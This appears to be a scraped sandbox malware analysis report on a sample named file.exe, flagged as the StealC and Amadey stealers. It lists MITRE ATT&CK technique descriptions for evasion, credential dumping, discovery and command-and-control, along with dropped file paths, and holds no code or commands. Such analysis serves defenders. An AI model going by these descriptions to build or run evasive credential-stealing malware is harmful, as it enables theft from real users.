Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AEGHJKJK

C:\ProgramData\CGCFCFBKFCFCBGDGIEGHJDAFHJ

C:\ProgramData\FCAAEHJDBKJJKFHJEBKF

C:\ProgramData\JJEGCBGI

C:\ProgramData\JJEGCBGIDHCAKEBGIIDB

C:\ProgramData\KJJJDHDGDAAKECAKJDAEGCBKEH

C:\ProgramData\KKKEBKJJDGHCBGCAAKEH

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre